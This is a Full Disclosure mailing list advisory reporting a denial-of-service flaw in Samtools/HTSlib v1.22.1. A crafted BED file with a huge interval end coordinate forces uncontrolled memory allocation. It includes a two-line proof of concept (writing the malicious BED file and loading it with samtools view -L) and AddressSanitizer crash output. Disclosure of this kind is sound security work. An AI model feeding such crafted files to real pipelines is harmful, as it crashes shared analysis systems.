Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib

From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 28 Sep 2025 12:17:19 -0400
A denial-of-service vulnerability exists in Samtools and the underlying
HTSlib when processing BED files containing extremely large interval
values. The bed_index_core() function in bedidx.c uses the interval end
coordinate to calculate allocation size without sufficient validation. By
supplying a BED record with a crafted end coordinate (e.g., near 2^61), an
attacker can trigger uncontrolled memory allocation requests via
hts_resize_array_(). This leads to process termination due to failed
allocations, effectively causing a denial of service. This issue can be
exploited by tricking a user or automated pipeline into loading a malicious
BED file with oversized intervals (e.g., via the -L option of samtools
view).



*Impact*


   - Denial-of-Service (DoS)

*Proof of Concept:*

Craft BED with an oversized interval

echo -e "chr1\t0\t2305843009213693940" > bad.bed


# Trigger DoS with samtools

samtools view -L bad.bed big.bam



*Output:*

=================================================================

==1060879==ERROR: AddressSanitizer: requested allocation size
0x10000000000000 (0x10000000001000 after adjustments for alignment, red
zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)

    #0 0xaad05674fd5c in realloc (/root/samtools/samtools+0xdfd5c)
(BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)

    #1 0xaad0568afc64 in hts_resize_array_ /root/htslib/hts.c:5070:15

    #2 0xaad056873d80 in bed_index_core /root/samtools/bedidx.c:120:13

    #3 0xaad056873d80 in bed_index /root/samtools/bedidx.c:149:17

    #4 0xaad056872780 in bed_read /root/samtools/bedidx.c:348:9

    #5 0xaad0567958b4 in main_samview /root/samtools/sam_view.c:1066:33

    #6 0xaad0567d5b40 in main /root/samtools/bamtk.c:246:55

    #7 0xfffaacef2290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16

    #8 0xfffaacef2374 in __libc_start_main csu/../csu/libc-start.c:360:3

    #9 0xaad0566acc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId:
031fb204568f835410c0dd07ee99a915c9a7b660)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: